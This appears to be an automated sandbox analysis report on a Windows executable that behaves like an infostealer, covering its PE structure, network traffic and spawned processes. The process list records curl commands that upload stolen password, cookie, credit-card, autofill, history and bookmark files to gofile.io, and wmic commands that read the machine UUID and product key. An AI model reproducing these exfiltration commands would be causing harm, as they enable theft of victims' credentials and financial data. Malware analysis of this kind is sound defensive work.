CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: a06f302f71edd380da3d5bf4a6d94ebd

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e9ec | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0xef8c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x46000 | 0x22bc | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x58000 | 0x768 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3bfb0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3be70 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2d000 | 0x400 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x2b170 | 0x2b200 | 420661550c659f884db561712e500aae | False | 0.5455615942028985 | data | 6.498595774489571 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2d000 | 0x12802 | 0x12a00 | b8a8224d719ff42417f9651a57587042 | False | 0.5229262793624161 | data | 5.768424648089835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x40000 | 0x5408 | 0xe00 | aff56347f897785154c53727472c548d | False | 0.13504464285714285 | data | 1.8315705466577277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x46000 | 0x22bc | 0x2400 | 2411a276649fc67a0a93227155911735 | False | 0.4740668402777778 | data | 5.334571311334213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x49000 | 0xef8c | 0xf000 | 5d72e0338b034862f777c781ab7d2219 | False | 0.8010091145833333 | data | 7.3501462320035476 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x58000 | 0x768 | 0x800 | 42d6242177dbae8e11ed5d64b87d0d48 | False | 0.5576171875 | data | 5.268722219019965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0x49208 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.56636460554371 |
| RT_ICON | 0x4a0b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.7287906137184116 |
| RT_ICON | 0x4a958 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.7471098265895953 |
| RT_ICON | 0x4aec0 | 0x909b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9971636186822983 |
| RT_ICON | 0x53f5c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.38309128630705397 |
| RT_ICON | 0x56504 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4826454033771107 |
| RT_ICON | 0x575ac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.699468085106383 |
| RT_GROUP_ICON | 0x57a14 | 0x68 | data | | | 0.7019230769230769 |
| RT_MANIFEST | 0x57a7c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857 |

| DLL | Import |
| --- | --- |
| USER32.dll | TranslateMessage, ShutdownBlockReasonCreate, GetWindowThreadProcessId, SetWindowLongPtrW, GetWindowLongPtrW, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, CreateWindowExW, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, GetMessageW |
| KERNEL32.dll | GetTimeZoneInformation, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetStringTypeW, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, HeapSize, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, GetConsoleWindow, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetDriveTypeW, IsDebuggerPresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetModuleHandleW, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableW |
| ADVAPI32.dll | ConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Dec 21, 2024 21:43:17.316370964 CET | 57632 | 53 | 192.168.2.4 | 1.1.1.1 |
| Dec 21, 2024 21:43:17.461277962 CET | 53 | 57632 | 1.1.1.1 | 192.168.2.4 |
| Dec 21, 2024 21:43:21.479024887 CET | 60393 | 53 | 192.168.2.4 | 1.1.1.1 |
| Dec 21, 2024 21:43:21.624078035 CET | 53 | 60393 | 1.1.1.1 | 192.168.2.4 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 21, 2024 21:43:17.316370964 CET | 192.168.2.4 | 1.1.1.1 | 0x7661 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false |
| Dec 21, 2024 21:43:21.479024887 CET | 192.168.2.4 | 1.1.1.1 | 0x6298 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |

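| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 21, 2024 21:43:17.461277962 CET | 1.1.1.1 | 192.168.2.4 | 0x7661 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false |
| Dec 21, 2024 21:43:21.624078035 CET | 1.1.1.1 | 192.168.2.4 | 0x6298 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
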
• api.gofile.io
• ip-api.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49732 | 208.95.112.1 | 80 | 7084 | C:\Users\user\Desktop\main.exe |

Timestamp: Dec 21, 2024 21:43:21.758725882 CET
Bytes transferred: 156
Direction: OUT
Data:
GET /json/ HTTP/1.1
Host: ip-api.com
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Connection: keep-alive

Timestamp: Dec 21, 2024 21:43:22.922743082 CET
Bytes transferred: 483
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 20:43:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 208.95.112.1 | 80 | 7084 | C:\Users\user\Desktop\main.exe
Timestamp | Bytes transferred | Direction | Data
Dec 21, 2024 21:43:23.045734882 CET | 182 | OUT | GET /json/8.46.123.189?fields=192511 HTTP/1.1
                                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                                      User-Agent: python-requests/2.32.3
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Connection: keep-alive
Dec 21, 2024 21:43:24.198999882 CET | 497 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:43:23 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 320
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 45.112.123.126 | 443 | 7084 | C:\Users\user\Desktop\main.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 20:43:18 UTC | 124 | OUT | GET /servers HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.gofile.io
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
2024-12-21 20:43:19 UTC | 1116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.27.1
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:43:19 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 401
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                      Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                      Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                                      X-Download-Options: noopen
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      ETag: W/"191-cA1AjYfVMPn12HUIpxVTAsdaZX4"
2024-12-21 20:43:19 UTC | 401 | IN | Data Ascii: {"status":"ok","data":{"servers":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store5","zone":"eu"},{"name":"store4","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store3","zone":"na"},{"name



                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:15:43:07
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6aba40000
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:15:43:07
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:15:43:10
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6aba40000
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

Target ID:3
Start time:15:43:13
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "ver"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:15:43:18
Start date:21/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff70f330000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff62e1f0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff7699e0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path softwarelicensingservice get OA3xOriginalProductKey
Imagebase:0x7ff626a60000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff62e1f0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:15:43:19
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff62e1f0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:15:43:20
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:15:43:20
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff62e1f0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:15:43:20
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:15:43:20
Start date:21/12/2024
Path:C:\Windows\System32\curl.exe
Wow64 process (32bit):false
Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Imagebase:0x7ff62e1f0000
File size:530'944 bytes
MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:15:43:20
Start date:21/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "ver"
Imagebase:0x7ff77b600000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:15:43:23
Start date:21/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist
Imagebase:0x7ff7293b0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

Execution Graph

Execution Coverage:10%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:16.1%
Total number of Nodes:2000
Total number of Limit Nodes:68
MultiByteToWideChar 20534->20538 20540 7ff6aba55e48 _get_daylight 11 API calls 20535->20540 20536->20529 20536->20534 20537 7ff6aba56561 20536->20537 20541 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20536->20541 20542 7ff6aba5e6c4 _fread_nolock 12 API calls 20537->20542 20539 7ff6aba565b2 20538->20539 20539->20529 20539->20530 20540->20530 20541->20537 20542->20534 20544 7ff6aba69da1 __crtLCMapStringW 20543->20544 20545 7ff6aba6835e 20544->20545 20546 7ff6aba601d4 6 API calls 20544->20546 20545->20231 20545->20232 20546->20545 19929 7ff6aba5a899 19930 7ff6aba5b358 45 API calls 19929->19930 19931 7ff6aba5a89e 19930->19931 19932 7ff6aba5a8c5 GetModuleHandleW 19931->19932 19933 7ff6aba5a90f 19931->19933 19932->19933 19939 7ff6aba5a8d2 19932->19939 19941 7ff6aba5a79c 19933->19941 19939->19933 19955 7ff6aba5a9c0 GetModuleHandleExW 19939->19955 19961 7ff6aba61548 EnterCriticalSection 19941->19961 19956 7ff6aba5aa1d 19955->19956 19957 7ff6aba5a9f4 GetProcAddress 19955->19957 19959 7ff6aba5aa29 19956->19959 19960 7ff6aba5aa22 FreeLibrary 19956->19960 19958 7ff6aba5aa06 19957->19958 19958->19956 19959->19933 19960->19959 20660 7ff6aba4b0a0 20661 7ff6aba4b0ce 20660->20661 20662 7ff6aba4b0b5 20660->20662 20662->20661 20664 7ff6aba5e6c4 12 API calls 20662->20664 20663 7ff6aba4b12e 20664->20663 20880 7ff6aba62920 20891 7ff6aba68654 20880->20891 20892 7ff6aba68661 20891->20892 20893 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20892->20893 20894 7ff6aba6867d 20892->20894 20893->20892 20895 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20894->20895 20896 7ff6aba62929 20894->20896 20895->20894 20897 7ff6aba61548 EnterCriticalSection 20896->20897 20905 7ff6aba4c110 20906 7ff6aba4c120 20905->20906 20922 7ff6aba5aae0 20906->20922 20908 7ff6aba4c12c 20928 7ff6aba4c418 20908->20928 20910 7ff6aba4c6fc 7 API calls 20912 7ff6aba4c1c5 20910->20912 20911 7ff6aba4c144 _RTC_Initialize 20920 7ff6aba4c199 
